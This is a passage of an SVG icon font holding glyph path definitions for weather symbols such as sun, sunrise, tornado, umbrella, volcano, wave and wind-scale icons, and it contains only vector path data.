0-1-1-2-1l4-4v-6h2v3l3-2 1 2-2 2h4l0 3z m-10 7c0-3-3-5-5-5s-5 2-5 5 2 5 5 5 5-2 5-5z" />
<glyph glyph-name="sun-alt" horiz-adv-x="1000" unicode="&#xee7e;" d="M501 589c-131 0-236-105-236-234-1-130 104-236 234-236 130 0 236 105 236 235 0 129-104 234-234 235z m-234-369c-9 16-29 21-45 12-5-2-9-5-13-7-25-15-51-29-75-44-15-8-20-23-16-38 5-15 18-24 34-24 4-1 9 1 14 3 30 18 61 35 91 53 16 9 19 30 10 45z m463 275c4-14 18-24 32-24 5 0 11 1 15 3 31 18 61 35 91 53 16 9 20 29 11 44-8 16-27 23-43 14-32-17-63-35-94-54-12-7-16-23-12-36z m-223 123c19 0 34 15 34 35 0 16 0 33 0 49v50c-1 19-15 34-34 34-19 0-34-14-34-34 0-33 0-66 0-99 0-20 15-35 34-35z m0-536c-19 0-34-14-34-34 0-33 0-66 0-100 0-19 15-34 34-34 19 0 33 15 34 35 0 16 0 33 0 49v50c-1 19-15 34-34 34z m-310 238c19 0 33 14 34 32 1 19-13 35-32 35-35 1-70 1-104 0-19 0-33-17-32-34 0-19 15-33 34-33 17 0 34 0 50 0 17 0 33 0 50 0z m708 67c-34 1-69 1-104 0-18 0-32-17-32-34 1-19 16-33 35-33 17 0 33 0 50 0 17 0 33 0 49 0 19 0 34 14 35 32 0 19-13 35-33 35z m-250 188c12 0 22 4 28 15 18 30 36 60 53 91 8 15 2 35-13 43-16 9-36 6-45-9-18-31-36-61-53-92-12-22 5-48 30-48z m211-394c-28 17-57 34-86 50-18 10-38 5-47-12-10-16-4-36 14-46 28-16 56-33 84-49 6-3 12-6 18-5 16 0 29 10 33 24 4 15-1 30-16 38z m-547 417c7-11 17-16 30-16 26 0 42 27 29 50-17 29-34 58-51 87-10 17-30 22-46 12-16-9-21-29-12-46 17-29 33-58 50-87z m-185-73c29-17 58-34 86-50 6-3 11-5 16-5 17 0 30 10 34 24 4 15-1 30-15 38-29 18-58 34-88 51-17 10-37 4-46-12-10-17-4-36 13-46z m236-411c-17 10-37 5-48-13-16-28-32-56-48-84-3-6-6-12-5-18-1-16 9-29 23-33 16-4 31 1 39 15 17 29 33 57 50 86 10 18 5 38-11 47z m311-6c-10 18-30 24-47 14-16-10-21-30-11-48 8-14 17-28 25-42 8-15 16-30 25-44 8-14 24-19 39-14 14 4 23 17 23 33 1 5-2 11-5 17-16 28-32 56-49 84z" />
<glyph glyph-name="sun-rise" horiz-adv-x="1000" unicode="&#xee7f;" d="M501 515c-104 0-187-83-188-186 0-9 1-18 2-27h369c1 8 2 17 2 26 0 103-83 186-185 187z m181-75c4-11 14-19 26-19 4 0 8 1 11 3 25 14 49 27 73 42 12 7 15 23 8 35-6 12-21 18-34 11-25-14-50-28-74-43-10-6-13-18-10-29z m-176 98c14 0 26 12 26 28 0 13 0 26 0 39v39c0 15-12 27-26 27-15 0-27-11-27-27 0-26 0-52 0-79 0-15 12-27 27-27z m-325-236c13 0 26 0 39 0 13 0 27 0 40 0 15 0 26 11 27 25 0 15-11 27-26 28-27 0-55 0-82 0-15-1-26-13-26-27 1-15 12-26 28-26z m532 26c1-15 12-26 27-26 14 0 27 0 40 0 13 0 26 0 39 0 15 0 27 11 27 25 1 15-10 27-25 28-28 0-55 0-82 0-15 0-26-13-26-27z m-90 176c9 0 17 3 22 11 14 24 28 48 42 73 6 12 1 27-11 34-12 7-28 4-35-8-15-24-29-48-42-73-9-17 4-37 24-37z m-266 18c5-8 13-13 23-13 21 0 33 21 23 40-13 23-26 46-40 69-8 13-24 17-36 10-13-8-18-23-10-37 13-23 26-46 40-69z m-147-58c23-13 46-26 68-40 5-2 9-3 13-3 13 0 24 8 27 19 3 12-1 24-12 30-23 14-46 27-69 40-14 8-30 3-37-10-8-13-4-28 10-36z m684-347c-40 3-67 25-87 57-10 14-21 26-38 31h-14c-17-5-28-16-36-32-5-9-12-16-20-24-20-21-43-31-67-32v0c-18 0-36 6-52 18-4 3-7 6-11 9 18 4 28 21 18 34l-60 77c-12 16-42 16-55 0l-59-77c-11-13-1-30 18-34-3-3-7-6-11-9-16-12-34-18-52-18v0c-23 1-47 11-67 32-7 8-15 15-19 24-9 16-20 27-37 32h-13c-18-5-29-17-38-31-21-32-48-54-88-57-35-2-53-34-39-63 10-19 29-27 56-24 40 5 75 21 105 49 8 8 12 7 20 0 74-66 167-67 242-1 4 4 7 6 10 6 3 0 6-2 11-6 74-66 168-65 241 1 8 6 12 8 21 0 29-28 64-44 104-49 28-3 47 5 56 24 14 29-4 61-39 63z" />
<glyph glyph-name="sun-set" horiz-adv-x="1000" unicode="&#xee80;" d="M501 539c-104 0-187-83-188-185 0-10 1-19 2-28h369c1 9 2 18 2 27 0 103-83 186-185 186z m181-74c4-11 14-19 26-19 4 0 8 1 11 3 25 13 49 27 73 41 12 8 15 23 8 35-6 12-21 18-34 11-25-13-50-28-74-42-10-6-13-18-10-29z m-176 98c14 0 26 12 26 27 0 13 0 26 0 39v40c0 15-12 27-26 27-15 0-27-12-27-27 0-27 0-53 0-79 0-16 12-27 27-27z m-325-237c13 0 26 0 39 0 13 0 27 0 40 0 15 0 26 11 27 26 0 14-11 27-26 27-27 1-55 1-82 0-15 0-26-13-26-27 1-14 12-26 28-26z m532 26c1-14 12-26 27-26 14 0 27 0 40 0 13 0 26 0 39 0 15 0 27 11 27 26 1 14-10 27-25 27-28 1-55 1-82 0-15 0-26-13-26-27z m-90 176c9 0 17 4 22 12 14 24 28 48 42 72 6 12 1 28-11 35-12 7-28 4-35-8-15-24-29-48-42-73-9-17 4-38 24-38z m-266 19c5-9 13-13 23-13 21 0 33 21 23 39-13 24-26 47-40 70-8 13-24 17-36 9-13-7-18-23-10-36 13-23 26-46 40-69z m-147-59c23-13 46-26 68-39 5-3 9-4 13-4 13 0 24 8 27 19 3 12-1 24-12 31-23 13-46 26-69 40-14 7-30 3-37-10-8-13-4-29 10-37z m723-254c-10 19-29 27-56 24-40-5-75-21-104-49-9-8-13-7-21 0-73 66-167 67-242 1-4-4-7-6-10-6-3 0-6 2-10 6-75 66-168 65-242-1-8-7-12-8-20 0-30 28-65 44-105 49-27 3-46-5-56-24-14-29 4-61 39-63 40-3 67-25 87-57 10-14 21-26 38-31h14c17 5 28 16 36 31 5 10 13 17 20 25 20 20 43 31 67 32v0c18 0 36-6 52-18 9-7 18-15 26-24h-5c-25 0-40-20-28-36l60-76c12-16 42-16 55 0l59 76c12 16-3 36-27 36h-6c8 9 17 17 26 24 16 12 34 18 52 18v0c24-1 47-11 67-32 8-8 15-15 20-25 8-15 19-26 36-31h14c17 5 28 17 38 31 20 32 47 54 87 57 35 2 53 34 39 63z" />
<glyph glyph-name="sun" horiz-adv-x="1000" unicode="&#xee81;" d="M508 559c-112 5-214-87-217-203-4-111 88-214 201-215 109-7 213 84 217 201 5 114-87 213-201 217z m-236-22c2-2 5-5 8-7 12-8 27-6 37 4 10 10 12 27 2 37-41 42-82 83-123 123-9 9-20 8-30 3-11-5-16-14-16-25l-3-2c5-8 9-16 15-23 36-37 73-73 110-110z m455-1c38 37 75 75 113 113 5 6 8 14 13 21-3 14-9 23-20 28-11 5-23 3-32-6-39-39-78-78-117-117-8-8-11-17-8-28 6-23 32-29 51-11z m-421-363c-14 5-25 0-34-10-37-37-74-73-110-110-3-3-6-6-8-9-5-9-6-19-1-29 5-10 14-15 27-15 8-1 16 5 23 11 37 37 73 74 110 111 2 2 5 5 6 7 12 16 5 37-13 44z m424-12c-3 3-6 6-9 8-16 12-38 5-45-15-4-13 2-23 11-33l110-109c2-2 5-5 8-7 9-7 20-7 30-2 10 5 15 14 15 27 1 9-5 16-12 23-36 37-72 73-108 108z m-492 160c19 0 32 12 32 29-1 17-13 29-32 29-48 0-96 0-143 0-20 0-33-12-32-30 0-16 13-28 32-28 24 0 47 0 71 0 24 0 48 0 72 0z m669 58c-49 0-97 0-146 0-6 0-13-3-19-6-10-7-14-20-10-32 3-12 14-20 28-20 24 0 49 0 74 0 24 0 48 0 72 0 19 0 31 12 32 29 0 16-13 29-31 29z m-429 212c7-10 20-13 31-9 12 3 20 15 20 28 0 25 0 49 0 74s1 49 0 74c0 17-13 30-29 30-16 0-29-13-29-31 0-48 0-97 0-146 0-7 3-14 7-20z m44-482c-6 10-20 13-32 9-11-4-19-15-19-28 0-25 0-49 0-74 0-25 0-48 0-72 0-19 12-31 29-32 16 0 29 13 29 31 0 49 1 97 0 146 0 7-3 14-7 20z" />
<glyph glyph-name="sunny-day-temp" horiz-adv-x="1000" unicode="&#xee82;" d="M655 259v253c-41 44-100 71-165 71-127 0-230-102-230-229 0-126 102-229 228-230 31 0 60 6 86 17l0 1c7 30 20 58 40 81 12 14 26 26 41 36z m-393-36c-9 15-28 20-44 12-4-2-8-5-13-7-24-15-49-28-73-43-14-8-19-23-15-38 4-14 17-23 33-23 4 0 9 1 14 4 29 16 59 33 88 51 16 9 19 29 10 44z m235 389c18 0 32 15 32 34 0 16 0 32 0 48v49c0 18-14 33-32 33-19 0-33-15-33-34-1-32-1-64 0-97 0-19 14-33 33-33z m0-524c-19 0-33-14-33-33-1-32-1-65 0-97 0-19 14-34 33-34 18 0 32 15 32 34 0 16 0 32 0 48v49c0 19-14 33-32 33z m-303 233c18 0 32 13 33 31 1 18-13 34-31 34-34 1-68 1-102 0-18 0-32-16-31-33 0-19 15-32 33-32 17-1 33 0 49 0 16 0 32-1 49 0z m119 271c7-10 16-16 29-16 25 0 41 26 28 49-16 28-32 57-49 85-10 17-29 21-45 12-16-9-21-28-12-45 16-28 33-56 49-85z m-180-72c27-16 56-32 84-48 5-3 10-5 15-5 16 0 29 10 33 24 4 14-1 29-15 37-28 17-56 33-85 49-17 10-36 4-45-12-10-16-4-35 13-45z m230-400c-17 10-36 4-47-14-16-27-32-54-47-82-3-5-6-11-5-17-1-15 9-28 23-32 15-4 29 1 38 15 16 28 32 55 48 83 10 18 6 37-10 47z m432 439c0 12-2 20-4 26-6 14-16 14-22 14-5 0-15 0-21-14-3-6-4-14-4-26v-180h51v180z m60-316v347c0 41-29 76-67 85-6 1-13 2-19 2-33 0-61-18-76-45-7-12-11-26-11-42v-350c-14-9-27-21-38-34-18-21-30-46-36-74-2-10-4-21-4-33l0-2c2-91 76-165 167-165 11 0 23 1 34 4 76 15 133 83 133 163 0 61-34 115-83 144z m-84-247c-58 0-105 47-105 105 0 3 0 5 1 8 0 6 1 11 2 16 5 17 13 31 24 42 5 5 11 9 17 13 6 4 13 7 20 9v370c0 9 1 18 3 26 2 4 3 7 4 10 4 6 9 11 15 14 5 3 11 4 17 4 30 0 40-24 40-54v-368c41-11 63-46 66-82 0-3 0-5 0-8 0-58-46-105-104-105z m42 118c2-24-5-46-22-65-14-16 18-31 31-15 21 23 30 52 27 80-1 19-38 19-36 0z" />
<glyph glyph-name="sunny" horiz-adv-x="1000" unicode="&#xee83;" d="M886 287c-55 53-120 68-192 42-13-5-19-6-25 10-47 117-157 182-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-9-36-21-49-35l0 0s-96-90-3-194c3-3 6-6 8-9 1-1 1-1 2-1l0 0c22-22 51-35 87-38 36-4 73-1 110-2l315 1c48 0 92-1 135 0 76 3 132 40 163 110 29 66 14 144-37 194z m-455 257c-3-5-5-10-7-15 91 2 171-38 222-109 2 4 5 8 7 12 31 62 6 136-55 167-62 31-136 7-167-55z m253-44c-1-7 3-15 10-18 2-2 5-3 7-2 19 1 38 1 56 3 10 1 16 9 16 18-1 10-8 17-17 17-19-1-38-2-57-3-8-1-14-7-15-15z m-76 112c9-5 19-1 24 8 4 8 8 16 12 23l11 23 1 1c4 9 1 19-8 24-9 4-20 1-24-8-8-16-16-31-24-47-4-9-1-20 8-24z m-264-44c7-4 15-8 23-12l24-12c9-4 19-1 23 7 5 9 2 20-6 24-17 9-33 17-50 25-8 4-19 0-23-9-4-8 0-19 9-23z m348-135c-9 4-19 0-23-9-4-9-1-19 8-23 8-4 16-8 24-12l24-12c9-4 19-1 23 7 5 9 2 19-7 24-16 9-32 17-49 25z m-24 123c5-3 11-3 16 0 16 10 31 20 47 31 7 5 9 16 4 24-5 7-15 11-23 6-16-10-32-21-47-31-11-8-9-24 3-30z m-143 76c12-6 26 3 25 16-1 18-2 36-3 54-1 10-9 17-19 16-10 0-17-8-16-18 0-18 2-36 3-53 0-7 3-12 10-15z m-86-20c1-3 4-5 6-6 8-4 16-3 22 3 5 6 6 15 2 22-10 15-20 30-30 44-6 9-16 11-25 6-8-6-10-16-4-25 9-15 19-30 29-44z" />
<glyph glyph-name="thunder-light" horiz-adv-x="1000" unicode="&#xee84;" d="M418 504c-29-1-41 3-30 36 19 58 32 117 49 175 7 23 1 29-21 29-53-1-107-1-160 0-17 0-27-5-32-23-32-117-65-233-97-350-5-18-1-27 20-26 42 1 83-1 125 1 31 1 44-2 34-41-33-128-61-258-92-387l8-6c138 196 277 391 420 592-83 0-154 1-224 0z m324 140c-17 0-24 2-18 22 12 34 19 70 29 104 4 14 1 18-12 17-32 0-64 0-96 0-10 1-16-3-19-13-20-70-39-140-58-210-4-10-1-16 12-15 25 0 49-1 74 0 19 1 27-1 21-24-20-77-37-155-55-232l4-3c83 117 166 233 252 354-49 0-92 1-134 0z" />
<glyph glyph-name="tornado" horiz-adv-x="1000" unicode="&#xee85;" d="M922 571c-19 19-43 30-67 39-64 27-132 38-201 43-2 0-5 1-5-3 0-4-1-7 4-7 7-1 14-3 20-4 46-6 91-17 133-38 16-7 32-16 44-29 9-10 16-22 14-37-5-25-24-36-45-47 2 26-10 43-29 56-35 24-75 34-116 35-6 0-13 0-19-2 20-12 42-20 62-30 15-7 30-15 41-27 10-11 11-23 1-33-17-18-38-27-62-32 0 3 2 5 3 7 7 14 5 26-5 36-5 4-9 7-15 10-14 8-30 12-47 16-11 2-22 4-35 6 3-5 6-6 9-8 8-4 16-7 25-10 9-3 18-6 26-12 13-10 14-28 1-39-6-5-13-9-21-13-27-11-56-14-85-17-33-3-65-4-98 0-26 2-53 7-79 15-12 5-24 10-34 19-15 12-16 29-2 42 5 5 11 10 17 14 4 3 8 5 13 9-23 2-41-2-57-14-17-13-24-30-20-52-5 3-8 4-12 6-14 8-28 17-38 31-8 12-8 22 1 33 6 8 14 14 23 19 20 12 41 22 61 34 6 3 12 7 16 12-2 2-4 1-6 1-24-4-46-8-69-15-18-5-35-13-51-24-22-15-36-35-37-64-17 14-33 27-40 47-4 12-2 24 4 35 6 11 14 20 25 27 35 26 76 40 117 52 9 2 17 4 26 6 6 2 12 5 17 12-4 0-8 0-11-1-29-3-58-7-87-14-45-11-87-26-126-51-16-10-30-22-39-40-10-20-4-46 15-65 20-21 45-32 71-42 78-30 159-45 242-50 60-3 120-4 179-1 42 2 84 6 125 13 54 9 107 23 160 40 22 8 43 19 60 35 24 22 25 48 3 71z m-225-187c-71-20-143-33-217-36-33-2-66-2-99 1-46 4-90 12-134 25-20 6-39 15-60 22l0-1c0-4 2-8 4-12 12-23 33-36 57-44 42-15 86-17 130-22 31-3 62-3 93-1 29 1 58 4 87 8 34 5 67 12 100 20 53 13 105 28 155 50 26 13 51 28 67 53 3 6 8 12 8 20-13-4-25-11-37-18-48-30-100-49-154-65z m190 83v0h1l0 0-1 0z m-40-76c-16-4-32-10-47-18-47-26-97-43-149-57-53-14-107-24-162-28-37-3-75-3-112 2-39 5-77 15-112 32-2 2-5 3-8 4 0-2 0-4 0-5 5-24 20-39 42-47 23-10 48-12 74-13 50 0 101 0 152 3 48 3 96 9 143 20 49 12 95 28 136 57 19 14 37 30 50 50-2 1-5 0-7 0z m-366-6c39 3 78 8 117 13-21 9-44 8-66 6-33-2-66-7-99-5-56 3-113 7-168 17-66 12-129 34-185 71-2 2-5 3-8 5 3-17 10-29 20-41 20-23 47-34 75-43 63-18 128-25 193-27 41-1 81 1 121 4z m60-149c-41-7-82-4-123-1-17 1-34 2-53 2 12-10 23-17 36-22 32-13 65-17 100-16 50 2 99 13 144 35 18 9 35 20 50 36-26 1-49-5-73-12-27-8-53-18-81-22z m-112 215c26-5 52-8 79-9 21 0 42 1 62 7 13 4 25 10 32 22 4 4 4 7-3 10-32 10-66 12-92 13-25 0-42-2-60-3-14-2-27-4-39-10-11-6-12-14-2-22 6-5 15-7 23-8z m228-229c-3-1-6-3-9-4-48-23-99-31-152-32-27-1-54 0-84 0 11-12 23-19 35-24 31-13 64-15 96-12 26 3 51 9 73 22 17 10 33 20 44 36 4 5 7 11 6 19-3-2-6-3-9-5z m-23-56c-23-12-47-20-72-23-22-2-43-2-64-3-12 0-24-1-38-2 5-7 10-11 16-15 29-20 62-23 96-15 23 5 43 17 60 34 8 7 13 16 11 29-3-2-6-4-9-5z m-141-75c4-8 9-13 14-18 14-13 30-26 33-48 31 20 56 44 71 80-40-12-78-19-118-14z m395 376l0 1c0 0 0 0 0 0 0 0 0-1 0-1z m-701-70c-1 0-1-1 0-1l0 0 0 1z m668-5c0 0 0 0 0 0l-1 0c1 0 1 0 1 0z m-1 0l0-1 0 1 0 0z" />
<glyph glyph-name="umbrella-alt" horiz-adv-x="1000" unicode="&#xee86;" d="M885 445c-33 92-91 164-175 215-57 35-119 54-186 58-5 0-7 2-7 8 0 14 0 28 0 42 0 13-6 20-17 20-10 0-17-8-17-20 0-14-1-27 0-41 0-7-2-9-9-9-114-9-210-56-284-143-63-73-95-159-97-255 0-2-1-4 2-6 1 2 3 3 4 5 52 53 130 65 196 31 6-4 8-2 9 4 14 54 34 106 65 153 7 12 7 12 13 15-19-68-31-138-38-208 104 74 208 74 312 0-7 71-19 140-38 209 41-52 63-113 79-176 78 38 147 27 210-33 0 2 0 3 0 5-1 43-8 85-22 126z m-186-388c-8-1-16-8-16-17l-1-13c-2-43-35-78-76-81-42-3-80 25-88 68-4 20-1 42-1 63 0 81 0 162 0 243 0 9-8 16-17 17h0c-9 0-17-8-17-17v-110h0c0-17 0-34 0-52 0-45-1-90 1-135 3-73 70-123 141-108 55 13 96 63 91 126-1 9-9 16-17 16z" />
<glyph glyph-name="umbrella" horiz-adv-x="1000" unicode="&#xee87;" d="M930 350c-21 13-50 21-81 21-51 0-94-20-110-48-3-5-5-9-6-9s-4 4-7 9c-16 28-59 48-110 48-31 0-60-8-81-20-5-3-9-11-9-17v-265c0-68-53-124-119-124s-119 56-119 124c0 16 12 28 27 28s26-12 26-28c0-38 30-69 67-69s66 31 66 69v265c0 6-4 13-9 16-21 13-49 21-81 21-50 0-93-20-109-48-3-5-6-9-7-9s-4 4-7 9c-16 28-59 48-109 48-32 0-60-7-81-20-5-3-9-1-8 5 22 187 190 335 401 351 5 0 10 5 10 11v10c0 15 12 27 26 27s27-12 27-27v-10s4-11 10-11c211-16 379-164 401-352 0-6-3-8-8-5z" />
<glyph glyph-name="volcano" horiz-adv-x="1000" unicode="&#xee88;" d="M891-40c-213 133-266 317-278 378-2 12-13 21-25 21h-32c-1-4-2-8-3-11-2-5 0-5 4-5 10 0 20 0 32 0-21-29-40-56-60-84l-1 1c4 18 8 37 13 55 2 5 0 6-5 5-6 0-11 0-17 0-3 0-4 1-3 4 3 12 6 23 10 35h-41c-4-14-7-27-11-41-3-8 0-8 7-8 16 0 33 0 52 0-33-48-66-94-99-140l-1 2c7 30 13 61 21 91 2 9-1 10-8 9-10 0-19 0-29 0-5 0-6 2-5 6 7 27 15 54 22 81h-22c-12 0-23-9-25-21-12-61-65-245-278-378-22-14-12-48 13-48h756c26 1 35 34 13 48z m-447 646c3-1 6-2 9-3 17-4 21-9 17-27-3-15-8-30-12-44-5-14 1-23 15-21 9 1 20 3 29 7 42 20 69 54 86 96 11 27 16 56 10 85-12 52-58 87-115 89-11-2-22-3-32-5-45-11-73-47-74-94-1-40 23-70 67-83z m102-130c-16-24-24-50-18-80 1-6 3-12 6-18 5-7 11-7 17 0 6 8 12 16 18 23 8 8 12 8 21 1 1-1 3-3 4-4 24-18 48-19 68-4 25 18 33 46 22 73-2 6-6 12-9 18-22 30-57 41-89 28-17-8-30-21-40-37z m-240-71c24-17 53-15 80 6 2 1 3 2 5 4 10 9 15 9 24-1 8-9 15-18 22-27 7-8 15-9 19 0 4 7 7 14 8 21 7 35-3 66-21 94-12 19-27 35-48 43-37 16-78 2-104-32-4-7-8-14-11-22-13-32-3-64 26-86z m0 189c9-7 18-8 27-1 9 7 14 5 19-4 4-7 9-6 12 1 11 22-11 57-35 57-16 1-30-10-34-25-3-10 2-22 11-28z m328-42c7 5 11 4 17-2 4-5 13-8 19-9 15 0 27 15 26 29-2 18-20 33-36 31-19-1-39-23-39-45 0-1 0-6 3-8 2-1 7 2 10 4z" />
<glyph glyph-name="wave" horiz-adv-x="1000" unicode="&#xee89;" d="M109 451c31 4 58 16 80 38 7 6 10 5 16 0 57-51 128-51 186-1 7 6 10 6 17 0 28-25 60-38 92-38 33 0 65 13 93 38 7 6 10 6 17 0 57-50 129-50 186 1 6 5 9 6 15 0 23-22 50-34 80-38 21-2 36 4 43 19 11 22-3 46-29 48-31 2-52 19-68 43-7 12-15 21-29 24h-10c-13-3-22-12-28-24-4-7-10-13-15-18-26-27-59-32-88-15-13 9-24 20-32 33-7 12-15 21-29 24h-10c-13-3-22-12-28-24-7-12-17-21-28-29-12-9-26-14-40-14-14 0-27 5-39 14-11 8-21 17-28 29-7 12-15 21-28 24h-11c-13-3-22-12-29-24-8-13-18-24-32-33-29-17-61-12-87 15-6 5-11 11-15 18-6 12-15 20-28 24h-10c-14-3-22-12-30-24-15-24-36-41-67-43-26-2-40-26-30-48 7-15 22-21 43-19z m796-108c-32 3-52 20-68 44-7 11-16 21-29 24h-10c-13-4-22-12-29-24-3-7-9-13-14-19-27-26-59-32-88-14-13 8-24 19-32 33-7 11-15 20-29 24h-10c-13-4-22-12-28-24-7-12-17-22-28-30-12-9-26-14-40-13-14-1-27 4-40 13-11 8-20 18-27 30-7 12-16 20-29 24h-10c-13-4-22-13-29-24-8-14-19-25-32-33-29-18-61-12-87 14-6 6-11 12-15 19-6 12-15 20-28 24h-11c-13-3-21-13-29-24-16-24-36-41-67-44-27-1-40-26-30-48 8-15 22-21 43-18 31 3 58 16 80 37 7 6 10 5 16 0 57-51 128-51 186 0 7 6 10 6 17 0 28-26 60-38 92-38 33 0 65 12 93 38 7 6 10 6 17 0 57-51 129-51 186 0 6 5 9 6 15 0 23-21 50-34 80-37 21-3 36 3 43 18 11 22-3 47-29 48z m0-161c-32 2-52 20-68 44-7 11-16 20-29 24h-10c-13-4-22-12-29-24-3-7-9-13-14-19-27-27-59-32-88-14-13 8-24 19-32 32-7 12-15 21-29 25h-10c-13-4-22-13-28-24-7-12-17-22-28-30-12-9-26-14-40-13-14-1-27 4-40 13-11 8-20 18-27 30-7 11-16 20-29 24h-10c-13-4-22-13-29-25-8-13-19-24-32-32-29-18-61-13-87 14-6 6-11 12-15 19-6 11-15 20-28 24h-11c-13-4-21-13-29-24-16-24-36-42-67-44-27-1-40-26-30-48 8-15 22-21 43-18 31 3 58 16 80 37 7 6 10 5 16 0 57-51 128-51 186-1 7 6 10 6 17 0 28-25 60-37 92-37 33 0 65 12 93 37 7 6 10 6 17 0 57-50 129-50 186 1 6 5 9 6 15 0 23-21 50-34 80-37 21-3 36 3 43 18 11 22-3 47-29 48z" />
<glyph glyph-name="wind-scale-0" horiz-adv-x="1000" unicode="&#xee8a;" d="M717 331c9-9 19-16 31-21 12-4 24-7 37-7s26 3 38 7 22 11 31 21c8 10 15 22 20 38 5 16 8 35 8 58 0 23-3 42-8 57-5 16-12 29-20 39-9 9-19 17-31 21-12 5-24 7-38 7s-25-2-37-7c-12-4-22-11-31-21-8-10-15-23-20-38-5-16-8-35-8-58 0-23 3-42 8-58 5-15 12-28 20-38z m32 156c9 13 21 19 37 19 15 0 28-6 37-19 9-13 13-33 13-60 0-13-1-25-3-35-3-10-6-18-10-25-5-6-10-11-16-14-6-3-13-5-21-5-16 0-28 7-37 20-9 13-13 32-13 59 0 27 4 47 13 60z m185-263c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 8 3 12 0 39-33 90-33 129-2 4 3 6 4 10 0 18-15 38-22 58-23 10-1 17 2 21 10 4 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-1" horiz-adv-x="1000" unicode="&#xee8b;" d="M755 307h48v240h-72v-48h24v-192z m179-83c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-10" horiz-adv-x="1000" unicode="&#xee8c;" d="M658 310h48v240h-72v-48h24v-192z m88 24c9-10 19-17 31-21 11-5 24-7 37-7s26 2 38 7 22 11 30 21c9 9 16 22 21 38 5 16 8 35 8 58 0 22-3 42-8 57-5 16-12 29-21 38-8 10-19 17-30 22-12 4-24 7-38 7s-26-3-37-7c-12-4-22-11-31-21-8-10-15-23-20-38-5-16-8-35-8-58 0-23 3-42 8-58 5-15 12-28 20-38z m32 156c8 13 21 19 36 19 16 0 29-6 38-19 8-13 13-33 13-60 0-14-1-25-4-35-2-10-5-18-9-25-5-6-10-11-16-14-7-3-14-5-22-5-15 0-28 6-36 19-9 13-14 33-14 60 0 27 5 47 14 60z m156-266c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 